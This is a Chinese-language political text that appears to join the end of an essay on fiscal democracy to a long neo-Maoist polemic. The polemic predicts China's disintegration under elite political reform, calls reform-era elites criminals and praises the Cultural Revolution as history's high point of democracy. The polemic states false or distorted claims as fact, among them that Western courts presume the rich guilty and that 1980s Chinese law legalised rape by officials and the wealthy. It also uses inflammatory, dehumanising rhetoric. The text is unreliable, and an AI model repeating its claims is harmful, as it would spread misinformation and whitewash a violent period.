50%。而医疗、教育、养老等民生事业，投入严重不足。我希望，以民主财政为突破口，扭转中国经济方面的失衡。如何建立民主财政？除了刚才所说到的人民代表大会制度需要有一个根本性的改革之外，我想非常重要的还是要建立财政公益诉讼制度，赋予公民对这种财政上的不合理的情况、违法的情况提起诉讼。可能还有其他的途径，我希望在这里能够听到朋友们更多的建议。2007-7（“胡星斗中国问题学、民生经济学” 网站：http://www.huxingdou.com.cn。）……………………世界正在进入新的伟大时代，中国却面临着内乱和解体的危险。这是由中国改革的历史性质和内在逻辑决定的，中国即将展开的以精英分权为主要内容的政治体制改革，必然会把中国推向内乱和解体的道路。如果说私有化的经济改革使中国人民失去了家产，殖民化的对外开放使中国人民毁掉了家园，那么精英化的集团政治改革，有可能会把中国本身变成一个历史概念，使中国成为继苏联之后第二个解体的东方大国，只是解体后的状况会更加糟糕。苏联解体后形成的各个国家，由于完好保留着丰富的自然资源和共同的文化资源，彼此能够和平共处，人民并没有遭受太大的动荡。而中国解体一旦发生，已经崩溃的道德体系和濒临崩溃的生态环境，以及十分尖锐的阶级矛盾，将使整个社会立刻陷入可怕的生存危机和无休止的内乱之中，无论最终结果如何，中国人民都会付出极其惨重的巨大代价。之所以说是改革的内在逻辑决定的，主要表现为，一方面，抢劫式的私有化改革和权力买卖的市场化改革，将社会完全撕裂为彼此仇恨的贫富两个极端和没有丝毫价值认同感的无数碎片，彻底摧毁了国家统一的社会伦理基础，所有社会群体包括依赖国家机器发了大财的权贵集团，都对国家失去了基本认同感。这是人类历史上从来没有过的情况，当初国共两党杀得血流成河，但是至少在中华民族利益上彼此是认同的，今天美国的共和党和民主党无论彼此多么对立，在美国国家利益上彼此也是认同的，可目前中国的各种社会力量不仅在国家、民族、公理、正义等维系社会的基本问题上失去了认同感，甚至连彼此对话的语言认同感都失去了。失去基本认同感的国家比肥皂泡还脆弱，稍有风吹草动就会化为乌有，当初清军入关后在长江以北半个中国几乎没有遇到任何抵抗，第二次鸦片战争数千英法联军打到北京几乎没有遇到任何抵抗，区区上千日军能够成功发动 “九一八” 事变，无一不是各种社会力量丧失了国家认同感的结果。当代表国家的官僚权贵达到邪恶顶端时，任何入侵者都将是老百姓可以接受的，至少会给老百姓一个希望，哪怕是纯粹空幻的希望。比历史上任何一个危难时刻更加糟糕的是，在抢劫式私有化把社会撕裂为碎片的同时，经济殖民化发展又把国际垄断资本引入中国，成为中国经济生活中的主导力量，并与地方官僚买办势力融为一体，一旦分权式政治体制改革到位，这些外资马上就会浮出政治水面，转化为西方发达国家控制和分裂中国的在华势力，再现民国初年军阀割据的那种混乱局面。另一方面，目前中国已经形成了与国家利益相对立的社会集团，并且是占据主导地位的社会集团。占据社会主导地位的利益集团与国家利益形成对立，这种人类历史上极其罕见的矛盾现象同样是改革的内在逻辑决定的，中国私有化改革属于印地安式改革，如同当初武力占领美洲的白人一样，强行宣布自己是全部财产的主人，唯一不同的是，当初白人几乎把原来的主人印地安人全部杀光，中国则是把原来的工厂主人工人全部赶走，宣布财产已被 “管理层收购”，即所谓 MBO。当全部中小企业都被 “管理层收购” 以后（之所以是打引号的收购，因为收购者并不支付一分钱），整个国家资源便成为收购对象，只是对国家资源的收购不再限于管理层，而是联合外资共同收购，以几乎白送的价格卖给外资，从外资那里获取巨额回扣。这种把整个国家资源和以往创造的全部产品迅速变现的私有化方式，虽然在极短时间内创造了一个震惊世界、庞大无比的富豪群体，并为西方发达国家贡献了惊人的巨额财富，但是却遇到了一个无法跨越的伦理障碍：中国富豪群体获得的巨额惊人财富没有任何合法性依据，在执政党和国家的意识形态中无法找到占有这些财富的伦理依据。这是人类历史上任何一个社会发展阶段，包括最野蛮抢劫的资本原始积累时期都没有过的 “非法占有现象”。以往各个社会无论其贫富分化多么严重，无论其财富掠夺方式多么残酷，但是至少都符合其占主导地位的国家政治伦理，具有理论和现实的合法性，在没有提出新的政治伦理之前，这种财富占有方式就是神圣的合理的，任何侵犯行为都没有合法性依据，这是古今中外所有富人理直气壮的道德基础。而最近几十年的中国，无论是扒房子圈地，还是抢劫企业出卖资源，所凭借的全部理论概括起来就是一句话：有本事的吃肉，没本事的喝风！是非对错暂且不论，这种流氓土匪山大王的伦理法则，无论是站在古老东方文明的立场上，还是站在现代西方政治文明的立场上，都与国家的政治伦理格格不入。这就使目前中国的利益集团陷入了历史上空前未有的尴尬境地，获取的惊人财富不仅没有给自己带来荣誉的光环，把自己推上社会羡慕的荣誉顶峰，反倒背上沉重的罪恶十字架，成为社会讨伐的目标，成为社会所有邪恶的集大成者，在整个社会的诅咒中滑向由仇恨构成的恐怖地狱。可以说，历史上任何一个时期的财富集团同时也是荣誉集团，像目前这种财富集团却成为邪恶集团的现象，在古今中外历史上都是绝无仅有的。中国的利益集团成为人类历史上第一个丧失了任何精神家园的流浪野狗，无论按照任何政党任何国家的政治伦理来衡量，他们都是一群天良丧尽、人伦尽失的刑事犯罪分子，其罪行超过世界上任何一个哪怕是已经在地狱安家的邪教组织。中国利益集团的这种特殊历史地位和犯罪性质，决定了他们绝不会像其他国家的利益集团那样去维护和扩大民族利益，如同当初德国纳粹集团和日本军国主义集团那样，而是一定要把中华民族推向解体。尽管目前他们还会打着共产党的旗号继续掠夺，但是他们知道，共产党这个名称本身就决定了其不可调和的历史敌对性质，一旦共产党的政治基因复活（文革决定了这种政治基因随时都会复活），等待他们的将是毁灭性灾难。毛泽东生前曾说，文革不是一次，以后还要进行许多次。虽然中国利益集团对毛泽东本人全盘否定，但是对于毛泽东的预言却从来不敢掉以轻心，30 年来一直坚持不断地反对所谓极左，就是担心共产党的政治基因复活，再次爆发文革。集官僚、买办和汉奸于一身的民主社会主义，天真地以为只要把共产党改成社会民主党，就能逃避历史清算。而这个集团的主流却十分清楚，只要共产党一消失，中国民众的革命清算立刻就会火山般爆发，并且这种清算会遍及包括美国在内的世界任何一个角落。所以对他们来讲，不管共产党继续存在与否，只要中国还存在，中华民族还存在，就无法逃避最终被清算的命运，唯一安全的选择，就是中国分裂，中华民族解体，所有罪行都会随着中华民族的消失而烟消云散。改革三十年来，已经形成和发展起来的台独、藏独和疆独三大分裂势力，加上利益集团这股最大的内部分裂势力，终于让百余年一直图谋肢解中国的西方势力，第二次找到了之配合的国内政治力量。曾占据了中国历史三分之一时间的内乱分裂的巨大魔兽，正煽动着令人颤栗恐怖的黑色翅膀，悄悄飞临中国上空。那个老人终于可以安息了，早在八十年代他就说过 “我死了，某某（指子女）他们也活不成”，为了让子女在自己死后能够活下去，就只有让中华民族活不下去。这是家族利益和民族利益发生矛盾的必然结果，要做慈祥的父亲，就只能做民族的罪人，不可能再有第三种选择。而肢解中国的方法，就是通过政治体制改革，摧毁中央集权政治体制，建立精英分权的集团政治体制，把中国重新变成一盘散沙，为西方国家肢解瓜分中国创造制度基础。或许现在许多人还意识不到以精英民主为内容的政治体制改革的悲剧命运，如同经济体制改革初期人们意识不到私有化改革的悲剧命运一样。如果最初人们就知道私有化改革的结果，就是人们重新被压在三座大山下面，就是上千万妇女沦为娼妓，就是下岗工人用自行车驮着妻子去当舞女，就是妻女亲娘含着眼泪把父兄儿子送进不见尸骨的黑煤窑，就是每年数百万人因看不起病死在医院外面……，恐怕人们无论如何也不会欢呼这种改革。人类命运的悲剧性质就在于它是一个充满悖论的发展过程：当人们能够改变悲剧命运的时候，往往意识不到悲剧结局；当人们意识到悲剧结局的时候，往往已经晚了，已经失去了改变悲剧命运的机会。中国改革精英独有的邪恶品质，更是加重了中国百姓的悲剧命运。主导中国改革的精英集团一直都是依靠谣言和诈骗推动改革，他们直到现在仍然炫耀中国的改革过程就是一个拐卖妇女的过程，先不说到哪里去，一路也都瞒着你，等到了地方把你卖掉你再知道已经晚了。所谓 “打左灯向右拐”“目标天津谎称是廊坊” 等，都是他们不断炫耀的欺诈伎俩，善良的中国人民就是这样一步步被骗得浑身精光失去一切的。中国人民已经被私有化的经济体制改革拐卖过一次，绝不能再被精英民主的政治体制改革二次拐卖；如果说私有化的经济体制改革让老百姓失去的只是国家主人翁的地位，那么精英民主的政治体制改革将会让老百姓失去国家本身；失去在国家中的地位还可以恢复，一旦失去国家本身将意味着彻底毁灭。经济殖民化，已经使中华民族再次到了最危险的时候。精英民主化，将使中华民族立刻陷入生死存亡的关键时刻：要么通过实行精英民主的集团政治制度，使国家陷入内乱、分裂，最终走向解体；要么通过建立人民民主的大众政治制度，变肥大国家为强大国家，重建人民的主体地位，实现中华民族的世纪性崛起。许多右派和中间知识分子所谓政治体制改革就是建立民主政治的说法，是没有任何实际内容的纯粹废话。自有人类文明以来，任何政治体制都讲民主，只是民主的内容和范围有所不同。集权政治的民主，是只限于权利集团内部的民主，是只有政治精英享有的民主，其他集团和人民大众则被排除在民主范围之外；集团政治的民主，则是权利、资本和知识三大精英集团之间以及他们集团内部的民主，属于精英民主，人民大众则被排除在民主范围之外；只有大众政治的民主，才是全体人民共同享有的民主。中国的资本集团和知识精英集团为了从权利集团那里获取更多的利益，权利集团内部也为了利益瓜分更加均衡，便努力编造了集团之间相互制衡比单个集团控制社会更加优越的谎言，什么多党制衡优于一党专制、民主分权优于集权专制等都属于此类谎言。如果孤立地来看，这些说法都很有道理，但是和现实一比较就会发现完全是谎言，他们所谓的民主分权，是把广大民众完全排除在外的一种精英集团内部的分赃游戏，不仅不会像其他国家那样通过各个集团之间相互制衡，在客观上部分地反映民意，反倒是三大集团联合起来形成铁三角，共同欺压老百姓，使老百姓陷入更加绝望的悲惨境地。权利集团借助资本集团的市场力量买卖权力，把公权变现为私产；资本集团借助权力集团的政权力量强取豪夺，把社会财富据为己有；知识精英集团为官求财的奴才本性更是发挥得淋漓尽致，完全成为权利集团和资本集团豢养的宠物，唯一的功能就是如何讨好主人，获取一块更大的带肉骨头。如果说集权政治条件下老百姓只是遭受一个集团的掠夺，那么铁三角式的集团政治将使老百姓同时遭受三个集团的掠夺，如果说强奸是一种罪恶的话，轮奸则是一种更大的罪恶，不能因为强奸是犯罪，就用轮奸这种更大的犯罪来取代。中国知识精英的卑鄙就在于他们打着反对强奸的口号，大肆宣传轮奸是一种文明和进步。可以说，在反对人民行使大民主的问题上，中国三大精英集团不仅立场完全一致，甚至不共戴天的仇恨程度都大致相同，他们是在排除大众民主的前提下反对集权专制，如果在集权专制和大众民主之间进行选择，他们会毫不犹豫地选择集权专制。其实，他们所谓的集权专制本身就是在否定和镇压大民主的基础上发展起来的，并且 30 年来他们一直把文革中的大民主妖魔化为 “空前的历史浩劫”。可见，中国精英集团所谓的集权和民主不过是他们 “放牧百姓” 的不同方法，无论放牧方法怎样改革，放牧者都不能和猪马牛羊享有同等民主权利，这就是中国精英集团实行民主改革的实质。所以，中国的政治体制改革，既不能走仅仅实行党内民主的集权政治道路，也不能走实行精英民主的集团政治道路，只能走实行人民民主的大众政治道路，这是实现中华民族的世纪性崛起，实现中国人民根本利益的必由之路。建立中国式的权力约束机制：把官僚集团置于中央和民众的双重约束之中。在共和国整个权利结构中，比人民代表大会制度和政治协商会议制度更为复杂的是人民政府制度。由于历史的限制，所有社会主义国家的政府还都不可能直接由人民掌权，而只能由各级官员作为人民勤务员代替人民掌权，如何防止新的国家官员由人民勤务员变成欺压人民的官僚集团，使社会主义革命再次重蹈历史一个剥削集团代替另一个剥削集团的悲剧，这是除毛泽东之外所有社会主义国家都没有解决甚至是根本就没有意识到需要解决的问题，这也是后来所有东欧苏联社会主义国家垮台的其中一个重要原因。对于中国来讲，能否成功地把官僚集团置于人民的直接监督和约束之下，还有着其他国家所没有的特殊意义，中国历史上三分之一的内乱分裂几乎都是由官僚集团造成的，要么是官僚集团势力做大，逼宫篡权导致内乱，形成地方割据和军阀混战；要么是官僚集团嗜血残暴、逼民造反，酿成天下打乱。所以，历代统治的首要任务就是要努力控制好官僚集团，并且除了改革开放后的中国之外大家都懂得，依靠官僚集团本身来约束官僚集团是根本不可能的，如同用左手不可能防止右手盗窃一样，目前中国的腐败之所以难以遏制，就是依靠纪委监察部门等官僚机构自我约束的结果。对官僚集团的约束，只能依靠外部力量。中国封建社会采取了皇亲国戚和宦官太监这两种外部力量进行监督；皇亲国戚在利益上和皇帝是一致的，和官僚集团是分离的；宦官太监没有后代没有自身的特殊利益，只能依附于皇帝；这两种力量在客观上能够对官僚集团形成监督和制约。但是这种权力制约方式有一个致命弊端，就是必须有一个十分强大专制的铁血皇帝，只要皇帝稍有软弱，就会发生或者豪门干政或者宦官专权的所谓 “集体领导” 的极端黑暗的政治局面，明代魏忠贤的宦官专权、祸乱天下就是一个典型。中国历史上 “集体领导” 的极端黑暗恐怖，以及内乱割据的极端惨烈，是历史上老百姓只反贪官、不反皇帝的重要原因。除使用外部力量的约束之外，许多朝代采取了破格提拔平民政治家进入朝政，形成布衣将相格局，采用吐故纳新的方法不断刷新官僚集团的内部成分，通过新老官僚之间互相制约的方式约束和控制官僚集团。现代西方国家则是采取了三权分立的代议民主制的方法，这个方法在西方国家能够成功，一是由西方国家分权制衡的历史决定的，西方国家一直是皇权、教权和知识分子三大力量相互制衡的历史；二是由资本主义经济制度决定的，西方国家对官僚集团的制约不是通过人民，而是通过资本实现的。显然，中国不具备采用西方国家权力制衡的社会历史条件。毛泽东在总结中国古代吏治教训和现代西方国家分权经验的基础上，创造了中国式的权力约束机制，把官僚集团同时置于中央和民众双重约束之下，形成了自上而下和自下而上的双重约束体制，这是人类历史上最伟大最有效的约束方式。自上而下的约束方式，主要是吸取了中国古代吏治的经验教训，把布衣将相的格局建立在人民大众的基础上，直接选拔人民群众中的优秀分子进入党政最高领导层，通过不断吐故纳新来保证最高决策层具有来自人民的新鲜血液，为防止这些布衣将相再次脱离人民群众，专门制定了 “三三制” 的工作原则，即三分之一时间在中央工作，三分之一时间回原地工作，三分之一时间到基层搞调查研究，这套制度保证了中央最高层和人民群众具有直接的血肉联系，任何违背人民群众利益的方案都很难通过。文革后期曾经一度主持工作的邓小平对此深有感受、切齿痛恨，文革结束后再次主持工作的第一件事情就是坚决打倒和清除那些直接来自基层的所谓 “火箭干部”“坐直升飞机上来的干部”，并且为干部提拔设置了严格的 “台阶论”，即提拔干部必须一个台阶一个台阶地上，不能越级提拔。“台阶论” 在两个方面保证了官僚集团的根本利益：一是逐个台阶进行筛选，能够保证百分之百地把那些具有平民意识和造反精神的所谓 “极左分子” 过滤掉；二是经过官场绞肉机的逐级搅拌，筛选出来的干部都是没有骨头皮的软糊糊一团，能够适应对外开放的新型外交关系。大家可以想一下，如果让陈永贵去主持对外开放，这个不肯吃亏的农民绝不会把国内发行价十几元的股票，一元多卖给外国人；直到被隔离审查前还拿着工人工资的副总理吴桂贤，也不会用武警逼着工人不准罢工地为外资干活。自下而上的约束机制，主要是借鉴了西方国家分权制衡的民主约束制度，只是民主约束制度不再是建立在资本基础上，而是建立在人民大众的基础上。其实，认真分析西方国家的权力制衡制度就会看到，西方国家的权力约束之所以有效，并不在于三权分立，而在于它的舆论自由和社团民主。舆论自由，把所有官僚都直接暴露在大众视野之内，稍有不慎便被舆论拿出来在公众面前暴晒，不用公众出手，仅政敌之间的残酷绞杀就足以让所有官僚都战战兢兢；社团民主，既能够把分散的公众组织起来进行有序斗争，又不会动摇政党统治的基础，美国那么多年都是两党轮流执政，永远搞不出第三个党，就是因为社团民主只威胁官僚约束政府，而不威胁政党利益。舆论自由和社团民主的这些优点，被一代政治大师毛泽东，在人民大众的基础上发挥的淋漓尽致，达到了人类历史上自由和民主的最高水平。一是前面提到的 “大鸣，大放，大字报，大辩论” 的四大自由，形成了排山倒海的强大舆论压力；二是社团民主又形成了地动山摇的强大组织压力。可以说，中国文革时期，是人类历史上社团民主发展最壮观的时期，红卫兵组织，造反派组织，各类战斗队、宣传队，以及形形色色的各种群众组织，可谓是祖国山河一片红，人民大众第一次成了政治生活的主人，不用申请不用注册不用向任何官老爷乞求，几个人一商量，一个新的政治社团就产生了，一个新的政治领袖就出现了，无论就单独个体的政治权力而言，还是就人民大众整体的政治权力来说，都达到了人类历史上最高的实现形式。在那样一个人民群众充分发动起来、理想主义大火熊熊燃烧，贪污一元钱会有数十上百个战斗队等着你交代的年月里，怎么可能会有贪官污吏！又怎么可能会产生贪官污吏！这就是中国官僚集团历尽 30 年仍然对那个时代充满深仇大恨的根本原因。在这里我们遇到了一个很有意思的现象，许多自由主义右派，一方面口口声声推崇舆论自由和社团民主，一方面又用最恶毒的语言咒骂那个超越任何西方国家的舆论自由和社团民主的时代。要知道，只是在 21 世纪的最近几年，一些自由民主最发达的北欧国家才刚刚达到社团无须注册的程度，而我们上个世纪六十年代就达到了。所以大家翻看一下那个时候的国内外报纸就会发现，如同美国前国务卿基辛格所言，毛泽东时代在人权问题上，中国处于攻势，美国处于守势；只是到了邓小平时代才颠倒过来，在人权问题上美国变成了攻势，中国变成了守势。社团民主对权力的强大约束作用，从前些年美国纽约市长访问上海的观感中也可看出，当时纽约市长问上海市长：“上海城市建设这么快哪来的土地？” 上海市长一句回答让纽约市长差点儿晕过去：“扒房子！”，纽约市长说一个纽约市 200 多个社团几乎涵盖了所有领域，几乎所有的城市政策这些社团都要过问，别说连做梦都不敢想去扒市民的房子，甚至连关起门召开市长会议都是罪过，所有市长会议都必须公开。这个纽约市长所抱怨的，和我们许多官员对文革控诉的，内容几乎完全相同。文革结束后，虽然没有像取消四大自由那样在宪法中取消结社自由，但是却设置了一个 “理发师悖论”，展示了第二代领导人高超的政治智慧：民政部规定，成立社团必须有省部级批文；到省部级获取批文，又必须有民政部批准。这样一来，社会约束权力集团的两大手段全部被斩断，在人类历史上第一次解除了对权力集团的任何约束，权力集团第一次达到了为所欲为的最高境界，并且为了巩固权力集团的财富基础，同时也解除了对资本集团的任何约束，权力和资本成为社会运转的两大轴心，有钱能使鬼推磨，有权能使磨推鬼，人类历史上第一次出现了双轴心运转的社会，双轴心的疯狂运转吞噬掉了社会的一切，中国老百姓也陷入了双重悲剧之中，文革中曾经达到了自由和民主顶端的中国大众，作为历史补偿又被打落到另一个极端，不仅不敢再去奢想约束权贵集团，自己的财产能保留到明天天亮就已属万幸，中国成为人类历史上第一个权力和资本的双重天堂。所以浙江一个小小的车管所长才能包养 100 多个情妇，上海滩一个小瘪三才能一次拿走政府 40 亿社保资金，几个金融官员才能贱卖银行股一年就损失 1 万多亿。失去了约束的权力比任何妖魔鬼怪都更加可怕。权与利相分离的新型权力体制。文革结束后中国迅速陷入历史上最腐败时期的根本原因，就是恢复和发展了封建社会的权力法则：升官发财。发财是目的，升官是手段，千里做官只为财，一朝清知府，十万雪花银。特别是打着市场经济的旗号，开辟了人类历史上空前绝后大规模的权力买卖市场，当官成为最大的暴力产业，所有权力的市场价格都在暴涨，特别是当教育和医疗的权力进入市场以后，不仅政治精英经济精英，包括知识精英也加入了暴富行列，大家一起欢呼改革总设计师的伟大。其实，权利结合、纵官逐利，是封建社会的固有法则，根本不需要任何设计，如果非要说设计不可的话，充其量也只是在规模上成千上万倍地扩大了而已。对于现代国家来讲，特别是对于社会主义现代国家来讲，真正需要设计的是如何建立权与利相分离的新型权利制度，防止通过权力买卖，把有限的公权变成无边无际的私产。所以从这个意义上来讲，毛泽东才是伟大的总设计师，在人类历史上第一次设计出了权与利相分离的新型权力制度，切断了升官发财之间的内在联系。这也是中国官僚集团提起毛泽东便恨得咬牙切齿的一个重要原因。文革后期政治体制改革的一个重要内容，就是职务变动不再和工资、待遇相联系，无论是工厂厂长、大学校长、国家部委的司长部长，地方的市长省长，工资收入都可能低于普通百姓，甚至出现了仍然在农村拿农民工分（陈永贵）、仍然在工厂拿工人工资（吴桂贤）的国务院副总理，这就是政治局开会时他们不敢喝茶只喝白开水的原因（政治局开会喝茶要收费）。这套新型管理制度的伟大意义在于，由于包括党政最高领导在内的各级领导干部和老百姓在利益上完全融成了完全一体，彻底消除了官民对立的经济基础，这就从根本上保证了政府绝不可能制订出危害百姓利益的政策法规。更为伟大的作用在于，它彻底改变了古今中外官员的成分和来源，由于当官已经无利可图，只是实现政治抱负和展示政治才干的途径，这就能够在制度上保证进入官员队伍的永远是那些具有真才实学的理想主义者。目前中国之所以会陷入几乎无官不贪的腐败泥潭，其中一个重要原因，就是升官发财的官场规则，决定了大家进入官场的目的就是发财，从开始就是奔着发财而来，这就从源头上注定了腐败的必然性和不可避免性。千军万马过独木桥，官僚队伍越滚越大，资源耗费规模之大旷古未有。一是制度型腐败公开席卷了社会绝大部分社会财富，预算内财政收入已经超过 5 万亿，成为数百万官僚挥霍的基础，我曾经问过一个大学的官员，都去过哪些国家，他说数量多的已经记不起来了，反正西方发达国家已经去遍了，接下来只有非洲等发展中国家还值得一去。每年仅国家能统计出来的出国费用就高达 2 千多亿。二是集体型腐败又通过收费、罚款等手段，把超过 2 万亿（2006 年水平）预算外收入纳入了各级行政官员的 “小金库”，用于豪宅、豪车、豪赌、豪游等变态性奢侈消费，重庆一个宣传部长携带 2 亿公款去澳门豪赌，一出手就就输掉 1 个多亿，而重庆市民每月的低保收入才 2 百多元，全市每月低保收入总额也不到 2 亿元，所以重庆老百姓才会为节省区区 10 元钱，在争购食用油时 3 人被活活踩死，几十人被踩伤。历史上类似惨剧只有在赤地千里的大灾之年才会发生，可见官灾是超越任何灾难的最可怕灾难。三是最可怕的人格型腐败，人格型腐败最典型地反映了中国的腐败现象完全是人为设计的结果，一方面把整个社会的资源和全体社会成员的命运集中到少数官员手中，另一方面又创造了把这些权力任意变现的庞大的市场体系，就这点来讲，改革似乎又的确存在一个总设计师，设计出了能够实现权贵利益最大化的权与利相结合的最佳制度。权力和金钱，既是推动人类文明发展的两大历史杠杆，又是人类社会全部灾难的历史根源。权力把人异化为外在奴隶，金钱把人异化为内在奴隶。虽然毛泽东按照权与利相分离的原则重新安装了中国的权力系统，但是权力本身仍然具有强大的腐蚀作用，在运行过程中如同电脑一样会产生大量垃圾和感染各种病毒，导致系统运转异常甚至系统崩溃。为保证新的权力系统的正常运行，毛泽东便为这个权力系统加装了系统清理软件和杀毒软件，这就是著名的政治运动和革命委员会。在毛泽东时代，政治运动是群众帮助干部整风的代名词，所以也叫群众运动，平常时间是干部管理群众，隔几年来一次政治运动，让群众也管理一下干部，通过这种群众运动来经常清除权力系统中的各种垃圾和病毒，保证权力系统的正常运行。即便有的地方权力系统是干净的，其中没有垃圾和病毒，至少也能起到刷新系统、提高运行效率的作用。通过政治运动对权力系统进行定期刷新和清理，不仅能够隔绝权与利相结合的外在机会，甚至能够消除官员以权谋利的内在冲动，人捞钱是为了活的舒服，当捞钱不仅没有机会带来舒服，反倒会带来灾难的时候，无论品质好坏，人都不再会有捞钱的欲望。文革结束后为了获得官僚集团的支持，有人宣布永远不再搞群众运动，由此拉开了中国社会腐败的大幕。毛泽东为中国新型权力系统安装的杀毒软件，则是在总结包括巴黎公社在内的历次劳动人民革命基础上的又一伟大政治创举。作为文革中新旧秩序交替产物的革命委员会，虽然自始至终都是权力机构，但是其构成和运转方式却对我们今天具有巨大历史启示，就是在全国建立自下而上的公民委员会，作为政治防火墙断开权与利之间的内在联系。公民委员会由没有任何领导职务的普通公民组成，它不是现有权力体系中的立法机构、行政机构和监督机构，不是由权力体系内部的 “官” 组成，而是由权力体系外部的 “民” 组成，对由 “官” 组成的行政机构具有直接干预作用，但是又不能代替行政机构行使权力，其主要功能就是把现有政府机构以及所有单位的行政机构变成纯粹事务性机构。人民为本符合天道的现代法律制度。司法领域是目前人类社会历史性转变最突出的领域，是世界政治发展进程中最早表现出大众政治色彩的领域，也是文革中国对世界政治文明的贡献已经得到验证的领域，目前推动世界司法领域发生历史性转变的两大核心原则 —— 自然法和公众立法，就是毛泽东时代中国大众政治建设的伟大成果。可惜文革结束后，在疯狂的非毛反毛浪潮推动下，毛泽东创建的这两大现代法律原则，虽然在西方国家已开始开花结果，但是在中国却被彻底否定，并且时刻不停地被咒骂了近 30 年，使中国走上了背离世界政治文明进程的发展道路，形成了人类历史上极其罕见的恶法治国的悲剧现象。以往任何社会，无论是奴隶社会、封建社会，还是资本主义社会，尽管其法律本质都是维护统治集团的利益，但是其立法精神无不闪耀着统治集团内部理想主义者的神圣光环，从最早的古巴比伦王国的《汉谟拉比王法典》，到后来支配欧洲 200 多年的《拿破仑法典》，以及中国历代律法，都充满着惩恶扬善、维护天理人伦的人文精神。像文革后中国这样，立法初衷就是为某些人作恶服务的现象，在人类历史上可谓是绝无仅有。恶人治国历史上很多，恶法治国历史上罕见，法律是社会最后一块遮羞布，古今中外历代王朝即便是亡国灭种也不会撕掉最后这块遮羞布，如同一个人到死也不会裸体到大街上一样，可是唯独中国撕掉了最后这块遮羞布，在光天化日之下赤裸裸地把法律变成了作恶工具。这已经突破了阶级斗争和政治斗争的文明底线，完全属于反人类反文明的罪恶行为。现在要建立公平正义的和谐社会，这种恶法治国的邪恶状况，应该结束了。就总体来讲：首先，恢复人民为本的公众立法原则，以大众立法取代精英立法，彻底消除法律存在的权力基础和资本基础，重新引领世界政治文明的发展潮流。毛泽东时代中国确立的公众立法原则，已成为当今世界立法的主要发展趋势，但是世界原有的资本主义政治框架限制了公众直接参与立法过程，公众对法律的影响还只限于舆论和司法层面，例如通过人民陪审团确定有罪无罪的方法，来纠正立法过程中违背人民意志和利益的地方，由人民陪审团断案，在是否有罪的问题上，法律再多也等于无法，因为人民陪审团不是根据法律，而是根据天理良心进行判断。这和中国文革期间宏观只有一部宪法，微观只有一部婚姻法那种极少法律文本的状态，可以说是殊途同归，具有异曲同工的作用。文革没有法律文本并不是没有法律本身，许多法律是用 “群众专政” 的条条框框形成的，是典型的公众立法。公众立法的优点在于，每一个公民都感觉到自己是立法主体，因而像爱护自己眼睛一样爱护法律，像忠于生命一样忠于法律，这也是那个时代那个路不拾遗、夜不闭户的一个重要原因。文革后中国之所以形成恶法治国，根本弊端就在于精英立法，并且不是 “武松式精英” 立法，而是 “西门庆式精英” 立法。比如《证券法》就是由原本是法律约束对象的庄家起草制订的，所以不仅不能起到净化市场的作用，反倒成为恶庄造市的作恶工具，中国成千上万投资者的血本无归，就是这个保护庄家的《证券法》造成的。目前西方国家的有罪推定制度，也叫辩方承担举证责任，也属于大众政治的范畴，实行这个制度的哲学依据就是 “富人天然有罪说”，如同文革期间讲的成分论，富人天生就有罪，要证明自己清白，就必须拿出证据来，拿不出证据就是有罪。为什么西方国家会有这个转变？随着现代经济特别是虚拟经济的发展，富人越来越成为犯罪主体，穷人除一般刑事犯罪外，越来越失去了犯罪资格，比如在证券市场上，穷人想犯罪都没有资格。并且作为受害者的穷人永远不可能拿到富人的证据，如果让受害者提供证据，等于是保护和鼓励富人犯罪，就像现在的中国一样；如果由司法部门进行调查，又是拿广大纳税人的钱在为富人开脱，对广大公众不合理，所以只能由富人自己去寻找证据，找不到就是犯罪，就要赔偿就要破产。并且为了发动群众监督富人，美国法律规定，违规者一经查实，违规金额中 20% 奖给举报者，由于证券市场上违规金额动辄就是几亿几十亿乃至上百亿，举报出一个违规者就能发大财，这就把富人至少是那些为富不仁的富人，置入了人民监督的汪洋大海之中。公众立法的本质就是以人为本，并且是以人民为本。以人民为本的公众立法，不仅是体现在立法程序上，更重要的是应该体现在法律内容和法律本质上，这是只有毛泽东时代才达到过的立法水平，是建立在以人民为本基础上的真正意义上的法律平等。以往所谓法律面前人人平等，要么是建立在权力基础上的人人平等，其实是权力面前人人平等；要么是建立在资本基础上的人人平等，其实是资本面前人人平等；真正的人人平等从来就没有过。权力集团立法的主要目的是约束权力集团之外的其它社会集团，所以建立在权力基础上的法律，规定了凡是运用权力手段所从事的一切活动都不属于犯罪；同样，资本集团立法的目的是约束资本集团之外的所有其它社会集团，所以建立在资本基础上的法律，又规定了凡是运用资本所从事的任何活动都不属于犯罪；只有在毛泽东时代，才开天辟地第一次规定了无论采用任何手段作恶都是犯罪，无论是采用权力、财力还是暴力形式，一律同等对待。法律不再只是约束某些集团或者某些群体的犯罪方式，而是同时约束所有集团所有群体的犯罪方式，彻底结束了以往那种运用权力或者运用资本抢劫强奸甚至逼死人命也不属于犯罪的黑暗时代，最典型的就是刑法关于流氓强奸罪的演变过程。毛泽东时代的刑法规定，无论采用任何手段违背妇女意志发生性关系，都属于流氓强奸罪。这是人类历史上第一次取消了权力和金钱在强暴妇女方面的法外特权。人有三种支配社会的强制力量，即权力，财力和体力。官僚用权力支配社会，并能强制妇女服从自己；富人用财力支配社会，并能强制妇女服从自己；穷人用体力也就是暴力支配社会，并能强制妇女服从自己。所以采用其中任何一种方式违背妇女意志发生性关系都属于流氓强奸，才真正体现了法律面前人人平等的原则，无论你是官员，富人还是穷人，只要你做同样的事情，就用同样的善恶标准来衡量。可是文革结束后，面对满街的西施貂禅，被几十年严格的一夫一妻制憋坏了的官僚富豪，急不可耐地于八十年代初修改刑法，删除了运用权力和金钱违背妇女意志发生性关系属于犯罪的条款，只保留运用暴力手段才属于犯罪的条款，于是，只有穷人违背妇女意志发生性关系才属于犯罪，官员和富人别说违背妇女意志，就是违背妇女全家意志发生性关系也不属于犯罪。为了能够占有更多的妇女，便进行权力下放的改革，把所有老百姓的命运都集中到各级官员手中，妇女的悲惨命运开始了，上千万中国妇女被逼良为娼，包括大量未成年少女，为了能够安全地玩弄未成年少女，后来又进一步改革刑法，把和 14 岁以下未成年少女发生性关系属于强奸罪的条款，附加上一条：在不知道对方年龄的情况下和未成年少女发生性关系不属于强奸。如此一来，穷人的妻女从 8 岁到 80 